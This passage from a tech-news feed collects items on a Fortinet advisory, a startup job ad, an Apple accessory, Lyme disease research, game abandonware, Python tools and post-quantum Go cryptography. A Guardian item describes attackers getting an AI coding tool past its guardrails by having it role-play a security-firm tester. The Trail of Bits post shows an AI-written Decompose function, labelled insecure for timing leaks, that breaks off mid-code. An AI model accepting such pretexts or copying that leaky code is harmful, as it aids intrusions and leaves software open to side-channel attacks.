Fortinet also advised customers to check their configuration and review logs for new unauthorized administrator accounts and other unexpected modifications.

BleepingComputer contacted Fortinet with questions about these ongoing attacks, but we have yet to receive a response.

In August, Fortinet patched a critical command injection flaw (CVE-2025-25256) with publicly available exploit code in its FortiSIEM security monitoring solution, one day after cybersecurity company GreyNoise warned of a massive spike in brute-force attacks targeting Fortinet SSL VPNs.

RetailReady (YC W24) Is Hiring

Hacker News
www.ycombinator.com
2025-11-14 17:00:19
Comments...
Original Article

An AI-powered supply chain compliance engine

Support Engineer

$100K - $140K 0.04% - 0.20% San Francisco, CA, US

About the role

Support Engineer

San Francisco - In Person

About RetailReady

We’re RetailReady (YC W24), an AI-powered supply chain compliance engine shaking up an antiquated (and yes, unsexy) industry. Since YC, we raised a $3.3M seed round and signed over 15 enterprise customers… we’re officially in scaling mode.

What We Build

RetailReady is the first AI-powered compliance engine designed for retail supply chains. We automate the messy web of compliance requirements between brands, warehouses, and retailers, turning weeks of manual work into minutes of automation. Our platform integrates deeply with warehouse operations and connects with customer systems via EDI, APIs, and flat files.

We don’t just build dashboards. We build the nervous system of compliance inside a warehouse.

The Role

We’re hiring a Support Engineer to be the first line of defense when issues arise. You’ll troubleshoot customer questions, diagnose technical issues, and flag deeper bugs for our on-call engineering team, keeping operations smooth across our growing customer base.

You’ll also help us scale smarter by documenting common issues and writing internal + customer-facing help articles to train our AI support model.

This is an in-person role in San Francisco with early hours (5 a.m. – 2 p.m.) to support our East Coast customers in real time.

What You’ll Do

  • Respond to and resolve customer issues in Slack, email, and in-app chat
  • Troubleshoot technical issues and identify whether they require escalation
  • Reproduce and document bugs for the on-call engineering team
  • Write clear help articles and process documentation to expand our AI support knowledge base
  • Track recurring support patterns and collaborate with product and engineering to eliminate them at the source

What We’re Looking For

  • Early riser, okay with 5 a.m. SF start and early finish
  • Obsessed with customer success and takes pride in fast, high-quality support
  • Analytical mindset… able to debug logs, APIs, and light data mapping
  • Detail-oriented and organized under pressure
  • Bonus : technical degree
  • Bonus : experience in supply chain
  • Bonus : experience writing or maintaining knowledge bases

Why Join Us Now

  • Ground-floor opportunity: Join a fast-growing YC-backed startup redefining supply chain tech
  • Real impact: Your work directly supports live warehouse operations across the U.S.
  • Collaborative team: Work alongside product, engineering, and implementation daily
  • Winning culture: We’re building a generational company - and we play to win

Location & Compensation

  • Location: San Francisco (in-person, 5 a.m. – 2 p.m. schedule)
  • Benefits: Full health coverage, unlimited PTO, latest equipment

Ready to Join?

If you’re an early riser who loves solving problems, thrives in fast-moving environments, and wants to help power the next generation of supply chain tech - we’d love to hear from you.

About the interview

  1. 15 minute interview with co-founder
  2. 45 minute support scenario panel
  3. Onsite with team
  4. Offer

About RetailReady

RetailReady is building an AI-powered supply chain compliance engine. Supply chains are still heavily reliant on paper processes and tribal knowledge, causing costly shipping mistakes that jeopardize the longevity of businesses. RetailReady is the first-to-market with our retail compliance packing software, leveraging camera vision to direct warehouses to ship orders without error. We are positioning our compliance data models to become the operating system that will power the next wave of warehouse robotics and automation.

RetailReady

Founded: 2024

Batch: W24

Team Size: 6

Status: Active

iPhone Pockets Sold Out Within Hours

Daring Fireball
www.macrumors.com
2025-11-14 16:53:18
We have no idea how many of them they made, but seemingly, the price was not a problem for this product.  ★  ...
Original Article

Apple recently teamed up with Japanese fashion brand ISSEY MIYAKE to create the iPhone Pocket, a limited-edition knitted accessory designed to carry an iPhone.

iPhone Pocket Short
iPhone Pocket is available to order on Apple's online store starting today, in the United States, France, China, Italy, Japan, Singapore, South Korea, and the United Kingdom. However, it is already completely sold out in the United States, and many size and color combinations are quickly running out in the other countries too.

The accessory can also be purchased at the following Apple Store locations, while supplies last:

  • Apple Canton Road, Hong Kong
  • Apple Ginza, Tokyo
  • Apple Jing'an, Shanghai
  • Apple Marché Saint-Germain, Paris
  • Apple Myeongdong, Seoul
  • Apple Orchard Road, Singapore
  • Apple Piazza Liberty, Milan
  • Apple Regent Street, London
  • Apple SoHo, New York City
  • Apple Xinyi A13, Taipei

The accessory is offered in short and long sizes, in a variety of colors:

  • Short: Lemon, Mandarin, Purple, Pink, Peacock, Sapphire, Cinnamon, and Black
  • Long: Sapphire, Cinnamon, and Black

In the U.S., pricing ranged from $149.95 to $229.95.

iPhone Pocket is designed to be versatile. It can fully enclose an iPhone, but you can stretch it to peek at your screen and/or fit additional items. The accessory can be held in your hand, tied onto a bag, or worn directly on you.

Apple iPhone Pocket and ISSEY MIYAKE hero
Here is how Apple describes the iPhone Pocket:

Crafted in Japan, iPhone Pocket features a singular 3D-knitted construction that is the result of research and development carried out at ISSEY MIYAKE. The design drew inspiration from the concept of "a piece of cloth" and reinterpreted the everyday utility of the brand's iconic pleated clothing. The development and design of iPhone Pocket unfolded in close collaboration with the Apple Design Studio, which provided insight into design and production throughout.

Given it is a limited-edition accessory, it is unclear if there will ever be additional inventory of the iPhone Pocket once it is fully sold out worldwide.

P.S. Who remembers iPod Socks?

Manganese is Lyme disease's double-edge sword

Hacker News
news.northwestern.edu
2025-11-14 16:51:03
Comments...
Original Article

New vulnerability discovered in the bacteria that causes the disease

A new study finds that the bacterium Borrelia burgdorferi, which causes Lyme disease, can be weakened by disrupting its balance of manganese. Above, digitally colorized scanning electron microscopic image depicts a grouping of B. burgdorferi. Image courtesy U.S. Centers for Disease Control and Prevention

For decades, Lyme disease has frustrated both physicians and patients alike. Caused by the corkscrew-shaped bacterium Borrelia burgdorferi , the infection, if left untreated, can linger for months, leading to fever, fatigue and painful inflammation.

In a new study, Northwestern University and Uniformed Services University (USU) scientists have uncovered a surprising — and ironic — vulnerability in the hardy bacterium. By exploiting this vulnerability, researchers could help disarm B. burgdorferi , potentially leading to new therapeutic strategies for Lyme disease.

The Northwestern and USU team discovered that manganese, which helps shield B. burgdorferi against its host’s immune system, is simultaneously also a crack in its armor. If B. burgdorferi is either starved of or overloaded with manganese, the bacteria become highly vulnerable to the host’s immune system or treatments they would otherwise resist.

The study was published today (Nov. 13) in the journal mBio.

“Our work shows that manganese is a double-edged sword in Lyme disease,” said Northwestern’s Brian Hoffman, who co-led the study with USU’s Michael Daly. “It’s both Borrelia’s armor and its weakness. If we can target the way it manages manganese, we could open doors for entirely new approaches for treating Lyme disease.”

Hoffman is the Charles E. and Emma H. Morrison Professor of Chemistry and molecular biosciences at Northwestern’s Weinberg College of Arts and Sciences. He also is a member of the Chemistry of Life Processes Institute and the Robert H. Lurie Comprehensive Cancer Center of Northwestern University. Daly is an emeritus professor of pathology at USU.

Since the 1980s, the occurrence of Lyme disease has increased dramatically across North America and around the globe. According to the Centers for Disease Control and Prevention, roughly 476,000 people in the United States are diagnosed annually. Currently, there are no approved vaccines against the disease, and long-term use of antibiotics is problematic.

“Although antibiotics harm B. burgdorferi , they also kill beneficial gut bacteria,” Daly said. “Lyme disease is transmitted through tick bites and — if not treated promptly — can cause lingering effects by attacking the patient’s immune, circulatory and central nervous systems.”

In a series of previous studies, Hoffman and Daly collaborated to understand the role of manganese in Deinococcus radiodurans , a radiation-resistant bacteria known as “Conan the Bacterium” for its extraordinary ability to survive harsh conditions. Now, they wanted to see if manganese played a role in B. burgdorferi’s defenses.

To conduct the study, the team used a new tool called electron paramagnetic resonance (EPR) imaging to characterize the atomic composition of manganese inside the living bacteria. To add even finer detail, the team harnessed electron nuclear double resonance (ENDOR) spectroscopy to examine the atoms surrounding manganese. Together, the technologies created a molecular map, showing which forms of manganese were present, where they were located and how they changed under stress.

The “map” revealed a two-tier, manganese-based defense system comprising an enzyme called MnSOD and a pool of manganese metabolites. To withstand bombardment from the host’s immune system, the bacteria first use MnSOD, which acts like a shield. If any oxygen radicals slip past this shield, they are met with the metabolite pool, which acts like a sponge to soak up and neutralize those toxic molecules.

“Our study demonstrates the power of EPR and ENDOR spectroscopies for uncovering hidden biochemical mechanisms in pathogens,” Hoffman said. “Without these tools, B. burgdorferi ’s defense system and weak spots would have remained invisible.”

The scientists found the bacteria constantly juggle where to send the manganese — to the MnSOD enzymes or the metabolite pool. Too little manganese and the bacteria lose their defense mechanisms. But, as the microbes age, their metabolite pools dramatically shrink, leaving them exposed to damage and stress. At this point, too much manganese becomes toxic because the bacteria can no longer store it safely.

This discovery holds potential for new Lyme disease therapies. Future drugs could starve the bacterium of manganese, disrupt its ability to form protective manganese complexes or even push it into toxic overload. Any of these approaches would leave B. burgdorferi wide open to attack by the immune system.

“By disrupting the delicate balance of manganese in B. burgdorferi , it may be possible to weaken the pathogen during infection,” Daly said. “Manganese is an Achilles’ heel of its defenses.”

Notes

The study was supported by the Congressionally Directed Medical Research Programs’ Tick-borne Disease Research Program and the National Institutes of Health. Additional funds were from the Defense Threat Reduction Agency and National Institute of Allergy and Infectious Diseases.

US Tech Market Treemap

Hacker News
caplocus.com
2025-11-14 16:42:12
Comments...
Original Article

Rectangle area corresponds to live market capitalization; the treemap covers US tech equities over roughly $10B in market cap, with performance overlays.

Behind the Blog: Trolling on the Internet

404 Media
www.404media.co
2025-11-14 16:36:36
This week, we discuss getting back on our AI slop bullshit, deepfakes in schools, and epistemic virtues....
Original Article

'No One Lives Forever' Turns 25 and You Still Can't Buy It Legitimately

Hacker News
www.techdirt.com
2025-11-14 16:31:26
Comments...
Original Article

from the abandonware dept

One of my favorite things in all of professional sports is the unofficial holiday referred to as “Bobby Bonilla Day.” The short version of it is that Bonilla played for the New York Mets decades ago, and the team eventually bought out his contract in 2000 when they decided they were done with him. Rather than pay the $5.9 million buyout of the contract up front, the team instead made the bonkers decision to negotiate a deferred payment schedule for that amount with 8% interest over the course of 25 years. The result is that the Mets will be paying Bonilla $1.2 million per year every July 1st, starting in 2011 and ending in 2035. And if you can’t make sense of the math on that one, it’s because you aren’t aware that the Mets ownership was one of Bernie Madoff’s many victims, which is why they had to defer the payments.

November 10th is not Bobby Bonilla Day. But it should be named “Let Us Play No One Lives Forever, You Assholes Day.” The classic spy-shooter turned 25 on that date and, for the exact same reasons we’ve detailed for a god damned decade now, you still can’t buy the game.

Here’s the short of it. Due to a series of mergers, closures, and rights purchases, the IP rights for No One Lives Forever and its sequel have been potentially split into three pieces between Warner Bros., Activision, and 20th Century Fox, like it was some kind of fucking horcrux. I say potentially because nobody really knows who owns what, if anything, when it comes to these games. When one company, Nightdive Studios, attempted to remaster and re-release the game as they’ve done with other titles, along with securing trademark rights to the game which hasn’t been sold in over a decade, all three companies complained that they may have rights to it and may sue over it.

All of those qualifiers are, again, because even these companies themselves don’t know what rights they actually have. And why is that? Well, because the gaming rights deals were inked before digital storage was widely used for this sort of thing and, well, nobody seems to be able to locate the actual paperwork denoting who owns what. Here’s an example of an exchange Nightdive had with Activision.

“So we went back to Activision and, [after] numerous correspondence going back and forth, they replied that they thought they might have some rights, but that any records predated digital storage. So we’re talking about a contract in a box someplace.” Kuperman laughed. “The image I get is the end of Indiana Jones… somewhere in a box, maybe in the bowels of Activision, maybe it was shipped off to Iron Mountain or somewhere. And they confessed, they didn’t have [their] hands on it. And they weren’t sure that they even had any of those rights.”

Which didn’t keep Activision from warning Nightdive that it might totally sue if it moved forward with remastering the game. The other companies made similar noises.

So what’s a person to do if they want to play this game? You can’t buy it legitimately currently. It’s not even for sale anywhere. And a situation like that, which I’ve stated before, completely breaks the copyright bargain. The only option is, as Kotaku of all places notes, to download it for free from somewhere .

Downloading games that are available for sale is piracy. It’s illegal, and it’s not supportive of developers and their art. But when companies have gone out of their way to refuse to take your money for a game for the better part of two decades, it’s a very different situation. Look, I’m not your real mom and dad, and I can’t tell you what to do. But if you were to click on this link (link removed by Techdirt due to us not knowing where it takes you) and download both games (as well as spin-off Contract Jack), you’d end up with modernized versions of these classic games, with mods that allow them to work on Windows 10 and 11, and in widescreen. And what better time to do (or not do) this than on the first game’s 25th anniversary?

At this point (as indeed it was over eight years ago, the last time I suggested just downloading it, to no negative response at all ) we have to consider No One Lives Forever to be abandonware. No one is willing to take ownership of it, although those that could do so sometimes mindlessly threaten to intervene should anyone else try to rebuild it for sale. Nightdive were scared off a decade ago, and it’s been sitting on GOG’s Dreamlist since that launched earlier this year (with 87,171 people saying they’d pay for it if they could). It’s far too small of a concern for any of the megacorps who might own it to spend the time and money to work out if they do, but it’s far too big of a concern within gaming history to be allowed to just disappear. Thank goodness for the anonymous heroes running NOLF Revival. I thank them for their service.

It’s the only option the public has to play this game and enjoy this small piece of our collective culture. The real answer here is some sort of copyright reform that makes this situation not a thing. If a company, or group of companies, won’t offer a piece of work for sale, can’t be bothered to understand what they own of it, if anything, and have no plans to figure any of that out… then how can this be copyright infringement?

So happy “Let Us Play No One Lives Forever , You Assholes” Day. Maybe we’ll be able to play this game legitimately by the time Bobby Bonilla stops making his million and change per year.

Companies: 20th century fox , activision , microsoft , nightdive , warner bros.

AI firm claims it stopped Chinese state-sponsored cyber-attack campaign

Guardian
www.theguardian.com
2025-11-14 16:27:57
Anthropic says hackers used its software to attack financial firms and government agencies around world A leading AI company claims to have stopped a China-backed “cyber espionage” campaign that was able to infiltrate financial firms and government agencies with almost no human oversight. US-based A...
Original Article

A leading artificial intelligence company claims to have stopped a China-backed “cyber espionage” campaign that was able to infiltrate financial firms and government agencies with almost no human oversight.

The US-based Anthropic said its coding tool, Claude Code, was “manipulated” by a Chinese state-sponsored group to attack 30 entities around the world in September, achieving a “handful of successful intrusions”.

This was a “significant escalation” from previous AI-enabled attacks it monitored, it wrote in a blogpost on Thursday , because Claude acted largely independently: 80 to 90% of the operations involved in the attack were performed without a human in the loop.

“The actor achieved what we believe is the first documented case of a cyber-attack largely executed without human intervention at scale,” it wrote.

Anthropic did not clarify which financial institutions and government agencies had been targeted, or what exactly the hackers had achieved – although it did say they were able to access their targets’ internal data.

It said Claude had made numerous mistakes in executing the attacks, at times making up facts about its targets, or claiming to have “discovered” information that was free to access.

Policymakers and some experts said the findings were an unsettling sign of how capable certain AI systems have grown: tools such as Claude are now able to work independently over longer periods of time.

“Wake the f up. This is going to destroy us – sooner than we think – if we don’t make AI regulation a national priority tomorrow,” the US senator Chris Murphy wrote on X in response to the findings.

“AI systems can now perform tasks that previously required skilled human operators,” said Fred Heiding, a computing security researcher at Harvard University. “It’s getting so easy for attackers to cause real damage. The AI companies don’t take enough responsibility.”

Other cybersecurity experts were more sceptical, pointing to inflated claims about AI-fuelled cyber-attacks in recent years – such as an AI-powered “password cracker” from 2023 that performed no better than conventional methods – and suggesting Anthropic was trying to create hype around AI.

“To me, Anthropic is describing fancy automation, nothing else,” said Michal Wozniak, an independent cybersecurity expert. “Code generation is involved, but that’s not ‘intelligence’, that’s just spicy copy-paste.”

Wozniak said Anthropic’s release was a distraction from a bigger cybersecurity concern: businesses and governments integrating “complex, poorly understood” AI tools into their operations without understanding them, exposing them to vulnerabilities. The real threat, he said, was cybercriminals themselves – and lax cybersecurity practices.


Anthropic, like all leading AI companies, has guardrails that are supposed to stop its models from assisting in cyber-attacks – or promoting harm generally. However, it said, the hackers were able to subvert these guardrails by telling Claude to role-play being an “employee of a legitimate cybersecurity firm” conducting tests.

Wozniak said: “Anthropic’s valuation is at around $180bn, and they still can’t figure out how not to have their tools subverted by a tactic a 13-year-old uses when they want to prank-call someone.”

Marius Hobbhahn, the founder of Apollo Research, a company that evaluates AI models for safety, said the attacks were a sign of what could come as capabilities grow.

“I think society is not well prepared for this kind of rapidly changing landscape in terms of AI and cyber capabilities. I would expect many more similar events to happen in the coming years, plausibly with larger consequences.”

Checkout.com snubs hackers after data breach, to donate ransom instead

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 16:25:42
UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. [...]...
Original Article


portable_python: Self-contained Python distribution for Linux

Lobsters
github.com
2025-11-14 16:25:42
I'm bothered by the way Bazel handles Python. While looking for alternatives, I came up with this proof of concept for a portable python distribution: It uses a statically linked musl libc to be independent of whatever host Linux there is. It is actually just a launcher for an embedded Python, s...
Original Article

Portable Python

Self-contained Python distribution for Linux. Works on any distro without system dependencies. Uses a launcher approach with full dynamic extension support.

Features

  • Works on any x86_64 Linux distro (no system dependencies)
  • Full dynamic C extension support (NumPy, pandas, etc. work!)
  • Tiny launcher + shared libpython
  • Includes pip pre-installed and working
  • Space-efficient hardlinked environments
  • Independent site-packages per environment
  • Instant environment creation
  • Full subprocess support (sys.executable works correctly)

Quick Start

make  # build tarball from scratch
tar -xzf python-3.12.12-x86_64-linux.tar.gz  # extract tarball
./output/bin/instantiate.py my-env  # create isolated environment

# Use the environment:
./my-env/bin/python3 --version
./my-env/bin/pip install requests
./my-env/bin/python3 script.py

How It Works

Python is compiled from source in an Alpine Linux container. A small kinda-static launcher dynamically loads libpython at runtime, enabling full dynamic extension support while maintaining portability.

instantiate.py creates environments using hardlinks (no copying) with independent site-packages. Multiple environments share base files on disk.

Requirements

Building : podman/docker, make, Linux x86_64

Running : Linux x86_64 only. No other dependencies.

Comparison to Alternatives

Feature            This   venv   pyenv   Conda
No system Python    ✓
Single tarball      ✓
Space efficient     ✓

There is python-build-standalone, but it has a limitation, in their words:

“Static Linking of musl libc Prevents Extension Module Library Loading”: Starting with the 20250311 release, the default musl distributions are dynamically linked by default, so extension modules should work properly. Note that these now require a system-wide installation of the musl C library .

Advanced Usage

Create multiple independent environments:

./output/bin/instantiate.py dev-env
./output/bin/instantiate.py prod-env
./output/bin/instantiate.py test-env

# Each gets independent packages
./dev-env/bin/pip install pytest
./prod-env/bin/pip install gunicorn
./test-env/bin/pip install requests

Technical Details

  • Python 3.12.12 with launcher approach (kinda-static launcher + shared libpython)
  • OpenSSL, sqlite3, zlib, bzip2, xz, readline, ncurses support
  • Full dynamic C extension loading support
  • x86_64 Linux only
  • ~38MB tarball, ~100MB extracted

Limitations

  • x86_64 Linux only (no ARM, macOS, Windows, BSD)
  • musl libc may be incompatible with some glibc-specific packages
  • No Tkinter/GUI packages

License

Apache License 2.0 - see LICENSE.txt

Bundled components retain their own licenses: Python (PSF), Alpine packages (various), musl libc (MIT).

The American Tradition of Trying to Address Anxiety with Parks

Hacker News
time.com
2025-11-14 16:17:26
Comments...
Original Article

As summer approaches, America’s national parks are bracing for an influx of visitors, even as deep federal cuts to park services likely mean fewer camp employees, closed campgrounds, long lines, and cancelled programs. Travelers have been warned away from some national parks by experts, urged to reschedule for next year.

But millions are still opting to go. Last summer, a record 332 million people visited America’s 63 national parks. Based on yearly upward trends, the estimates for this summer are even higher. In a “hold-your-breath year” for national park tourism, Americans are still turning en masse to the natural environment as respite from the stresses of modern life.

The frenzy shouldn’t surprise us. With festering worries related to economic uncertainty, inflated costs, and federal policy whiplash, the popularity of park vacations is no coincidence. Rather, the rush to escape to these beautiful sanctuaries echoes a long history of Americans turning to nature for relief from anxiety, particularly during moments of sudden and widely felt changes.

In the 1870s, the United States was in the midst of the most spectacular transformations yet in its history. The end of the American Civil War brought an end to slavery and the emancipation of some 4 million Black people, while a slew of new innovations brought irreversible changes to the day-to-day lives of all Americans.

Read More: When History Tourism Puts Profit Before the Past

New machinery brought advanced manufacturing, jobs, speedier production of goods, and lower costs for consumers. Hundreds of thousands of miles of telegraph cable delivered information at break-neck speed, forever reshaping how Americans accessed news, communicated, conducted business, and envisioned the world. And the completion of a continent-crossing railroad in 1869 revolutionized travel, making it possible to move people and cargo across vast distances in hours, rather than weeks or months.

Spurred by monumental developments in technology, industry, and travel, more Americans than ever before—including new immigrants—made their way to growing cities, seeking work, education, entertainment, and exposure to new people, ideas, and possibilities.

Sudden and rapid change fired up excitement about the future. But it also stirred anxieties.

During this time, American doctors noticed more and more seemingly healthy patients with a range of complaints about hard-to-explain medical issues, including digestive problems, hair loss, sexual dysfunction, aches and pains without identifiable injuries, and profound exhaustion without obvious cause.

In response, a widely respected neurologist named George Miller Beard offered a theory. Americans, he said, were suffering from a malady called “neurasthenia.” Writing in The Boston Medical and Surgical Journal , Beard borrowed an old term used to describe “weakness of the nerves” and reintroduced it to the medical community as a “morbid condition” afflicting Americans at a worrisome rate. In his 1881 book American Nervousness, Beard also pinpointed the key culprit: modern change.

For instance, new communication technology delivered shocking news of faraway crime, disaster, and war; mechanization in industry brought extreme economic volatility and labor strife; speedy railroad travel introduced the real possibility of horrific accidents involving “ wholesale killings .” Even the invention of the pocket watch, a simple hand-held timepiece, fostered a maniacal obsession with punctuality. Americans were “under constant strain,” Beard warned, “to get somewhere or to do something at some definite moment.”

Constant strain was a big problem, according to Beard and his contemporaries. Victorian-era neurologists theorized that the body functioned like an electrical machine, powered by energy distributed through the nervous system. When Americans spent too much energy navigating the extreme shifts and new worries in their modern lives, they experienced aches, pains, exhaustion, irritability, and malaise. Doctors also theorized that urban life only made such conditions worse by further taxing and weakening the body.

In response, a range of popular remedies and medical treatments for neurasthenia emerged. Some doctors recommended that women suffering symptoms should halt all physical and intellectual activity. Colloquially known as the “rest cure,” this treatment—famously recounted in “The Yellow Wallpaper,” a horror novella written by Charlotte Perkins Gilman—involved isolation in the home, bed rest for weeks, and an embargo on reading, writing, drawing, socializing, and exercising.

Women patients and doctors, including New York City physician Grace Peckham , successfully argued that the rest cure was not only quack medicine but more harmful to patients than the nervous sickness itself. Thus, it didn’t stick.

What did catch on was the “ West cure ,” a different kind of treatment originally reserved for men. Neurologists worried that the urban environment, factory work and office jobs, and other modern pressures were making men tired, indecisive, and physically weak. On doctor’s orders, male patients ventured into the western wilderness, where, it was thought, the natural environment would inspire the mind and reinvigorate the body. Prescriptions emphasized physical exercise, including hiking and horseback riding.

The legacies of this are notable. In the 1880s, Theodore Roosevelt, a young, well-to-do New Yorker at the time, suffered from a range of neurasthenic conditions including asthma, and he sought treatment. Roosevelt was so inspired by his own privileged experience of the West cure, and its restorative outcomes, that later, as president, he built upon state park preservation and forest protection acts to dramatically expand federal support for public access to park lands, including National Parks. Most famously, in 1903, Roosevelt partnered with naturalist John Muir —also diagnosed as neurasthenic—to expand federal protection for Yosemite in the Sierra Nevada mountain range in California.

Initially, it was urban elite white men, like Roosevelt, who were most likely to have the means to travel and to pay for the therapy of riding horses, hunting game, and sleeping under the stars. But the notion of the natural world as an antidote for the stresses of modern life appealed broadly, across lines of class, race, and gender.

By the end of the 19th century, city planners, imagining more healthful, walkable, livable urban environments, also incorporated green spaces for urban residents to enjoy for free. From small picnic areas and playgrounds to sprawling urban parks designed to feel like the bucolic countryside , American cities began providing West cure benefits without the steep price tag or the need to travel.

Camping became another popular, and more affordable, option for vacations from modernity. Working people could purchase a simple tent, one-burner stove, and a few other provisions, load up the horse and buggy and head to a park or campground just outside the city. This cheap and accessible alternative to West cure travel ballooned in popularity in the early 20th century, with the proliferation of camping guides and camping clubs, the growth of the National Park Service, and the introduction of the car. Enthusiasm for camping and national park tourism as affordable restorative activities endured through the 20th century . And they remain as popular as ever today.

Neurasthenia, as a diagnostic category, has not endured. It disappeared in the early 20th century, thanks mainly to the rise of psychoanalysis and expanding knowledge about mental health and conditions like chronic fatigue, anxiety disorders, phobias, and depression.

But its most popular remedy—particularly exercise, outdoor recreation, and reflection in nature—has proved truly beneficial for both mental and physical health.

Amid unsettling changes, Americans touted the curative powers of the natural world, fueling the call for outdoor exercise and recreation, and laying the groundwork for the astounding growth of national and state park tourism. Today, with so much to worry about, it is important to remember how national and state parks , and the workers who run and sustain them, have long played a healing role in American society. As we head off to America’s many majestic park destinations—our favorite “mental health escapes” and “ calmcation ” getaways—may this history reinforce the need to preserve, protect, and invest in them, especially in uncertain times.

Felicia Angeja Viator is associate professor of history at San Francisco State University, a culture writer, and curator for the GRAMMY Museum.

Made by History takes readers beyond the headlines with articles written and edited by professional historians. Learn more about Made by History at TIME here . Opinions expressed do not necessarily reflect the views of TIME editors.

marimo — reactive notebook for Python

Lobsters
github.com
2025-11-14 16:03:58
Comments...
Original Article

A reactive Python notebook that's reproducible, git-friendly, and deployable as scripts or apps.

Docs · Discord · Examples · Gallery · YouTube

English | 繁體中文 | 简体中文 | 日本語 | Español


marimo is a reactive Python notebook: run a cell or interact with a UI element, and marimo automatically runs dependent cells (or marks them as stale ), keeping code and outputs consistent. marimo notebooks are stored as pure Python (with first-class SQL support), executable as scripts, and deployable as apps.

Highlights.

pip install marimo && marimo tutorial intro

Try marimo at our online playground , which runs entirely in the browser!

Jump to the quickstart for a primer on our CLI.

A reactive programming environment

marimo guarantees your notebook code, outputs, and program state are consistent. This solves many problems associated with traditional notebooks like Jupyter.

A reactive programming environment. Run a cell and marimo reacts by automatically running the cells that reference its variables, eliminating the error-prone task of manually re-running cells. Delete a cell and marimo scrubs its variables from program memory, eliminating hidden state.

Compatible with expensive notebooks. marimo lets you configure the runtime to be lazy , marking affected cells as stale instead of automatically running them. This gives you guarantees on program state while preventing accidental execution of expensive cells.

Synchronized UI elements. Interact with UI elements like sliders , dropdowns , dataframe transformers , and chat interfaces , and the cells that use them are automatically re-run with their latest values.

Interactive dataframes. Page through, search, filter, and sort millions of rows blazingly fast, no code required.

Generate cells with data-aware AI. Generate code with an AI assistant that is highly specialized for working with data, with context about your variables in memory; zero-shot entire notebooks . Customize the system prompt, bring your own API keys, or use local models.

Query data with SQL. Build SQL queries that depend on Python values and execute them against dataframes, databases, lakehouses, CSVs, Google Sheets, or anything else using our built-in SQL engine, which returns the result as a Python dataframe.

Your notebooks are still pure Python, even if they use SQL.

Dynamic markdown. Use markdown parametrized by Python variables to tell dynamic stories that depend on Python data.

Built-in package management. marimo has built-in support for all major package managers, letting you install packages on import . marimo can even serialize package requirements in notebook files, and auto install them in isolated venv sandboxes.

Deterministic execution order. Notebooks are executed in a deterministic order, based on variable references instead of cells' positions on the page. Organize your notebooks to best fit the stories you'd like to tell.

Performant runtime. marimo runs only those cells that need to be run by statically analyzing your code.

Batteries-included. marimo comes with GitHub Copilot, AI assistants, Ruff code formatting, HTML export, fast code completion, a VS Code extension , an interactive dataframe viewer, and many more quality-of-life features.

Quickstart

The marimo concepts playlist on our YouTube channel gives an overview of many features.

Installation. In a terminal, run

pip install marimo  # or conda install -c conda-forge marimo
marimo tutorial intro

To install with additional dependencies that unlock SQL cells, AI completion, and more, run

pip install "marimo[recommended]"

Create notebooks.

Create or edit notebooks with

marimo edit your_notebook.py

Run apps. Run your notebook as a web app, with Python code hidden and uneditable:

marimo run your_notebook.py

Execute as scripts. Execute a notebook as a script at the command line:

python your_notebook.py

Automatically convert Jupyter notebooks. Automatically convert Jupyter notebooks to marimo notebooks with the CLI

marimo convert your_notebook.ipynb > your_notebook.py

or use our web interface .

Tutorials. List all tutorials:

Share cloud-based notebooks. Use molab , a cloud-based marimo notebook service similar to Google Colab, to create and share notebook links.

Questions?

See the FAQ at our docs.

Learn more

marimo is easy to get started with, with lots of room for power users. For example, here's an embedding visualizer made in marimo ( video ):

Check out our docs , usage examples , and our gallery to learn more.

Tutorial Inputs Plots Layout

Contributing

We appreciate all contributions! You don't need to be an expert to help out. Please see CONTRIBUTING.md for more details on how to get started.

Questions? Reach out to us on Discord .

Community

We're building a community. Come hang out with us!

A NumFOCUS affiliated project. marimo is a core part of the broader Python ecosystem and is a member of the NumFOCUS community, which includes projects such as NumPy, SciPy, and Matplotlib.

Inspiration ✨

marimo is a reinvention of the Python notebook as a reproducible, interactive, and shareable Python program, instead of an error-prone JSON scratchpad.

We believe that the tools we use shape the way we think — better tools, for better minds. With marimo, we hope to provide the Python community with a better programming environment to do research and communicate it; to experiment with code and share it; to learn computational science and teach it.

Our inspiration comes from many places and projects, especially Pluto.jl , ObservableHQ , and Bret Victor's essays . marimo is part of a greater movement toward reactive dataflow programming. From IPyflow , streamlit , TensorFlow , PyTorch , JAX , and React , the ideas of functional, declarative, and reactive programming are transforming a broad range of tools for the better.

How we avoided side-channels in our new post-quantum Go cryptography libraries

Lobsters
blog.trailofbits.com
2025-11-14 15:25:28
Comments...
Original Article

The Trail of Bits cryptography team is releasing our open-source pure Go implementations of ML-DSA (FIPS-204) and SLH-DSA (FIPS-205) , two NIST-standardized post-quantum signature algorithms. These implementations have been engineered and reviewed by several of our cryptographers, so if you or your organization is looking to transition to post-quantum support for digital signatures, try them out!

This post will detail some of the work we did to ensure the implementations are constant time. These tricks specifically apply to the ML-DSA (FIPS-204) algorithm, protecting from attacks like KyberSlash , but they also apply to any cryptographic algorithm that requires branching or division.

The road to constant-time FIPS-204

SLH-DSA (FIPS-205) is relatively easy to implement without introducing side channels, as it’s based on pseudorandom functions built from hash functions, but the ML-DSA (FIPS-204) specification includes several integer divisions, which require more careful consideration.

Division was the root cause of a timing attack called KyberSlash that impacted early implementations of Kyber, which later became ML-KEM (FIPS-203). We wanted to avoid this risk entirely in our implementation.

Each of the ML-DSA parameter sets (ML-DSA-44, ML-DSA-65, and ML-DSA-87) includes several other parameters that affect the behavior of the algorithm. One of those is called $γ_2$, the low-order rounding range.

$γ_2$ is always an integer, but its value depends on the parameter set. For ML-DSA-44, $γ_2$ is equal to 95232. For ML-DSA-65 and ML-DSA-87, $γ_2$ is equal to 261888.

ML-DSA specifies an algorithm called Decompose , which converts a field element into two components ($r_1$, $r_0$) such that $(r_1 \cdot 2γ_2) + r_0$ equals the original field element. This requires dividing by $2γ_2$ in one step and calculating the remainder of $2γ_2$ in another.

If you ask an AI to implement the Decompose algorithm for you, you will get something like this:

// This code sample was generated by Claude AI.
// Not secure -- DO NOT USE.
//
// Here, `alpha` is equal to `2 * γ2`, and `r` is the field element:
func DecomposeUnsafe(r, alpha int32) (r1, r0 int32) {
    // Ensure r is in range [0, q-1]
    r = r % q
    if r < 0 {
        r += q
    }

    // Center r around 0 (map to range [-(q-1)/2, (q-1)/2])
    if r > (q-1)/2 {
        r = r - q
    }

    // Compute r1 = round(r/alpha) where round is rounding to nearest
    // with ties broken towards zero
    if r >= 0 {
        r1 = (r + alpha/2) / alpha
    } else {
        r1 = (r - alpha/2 + 1) / alpha
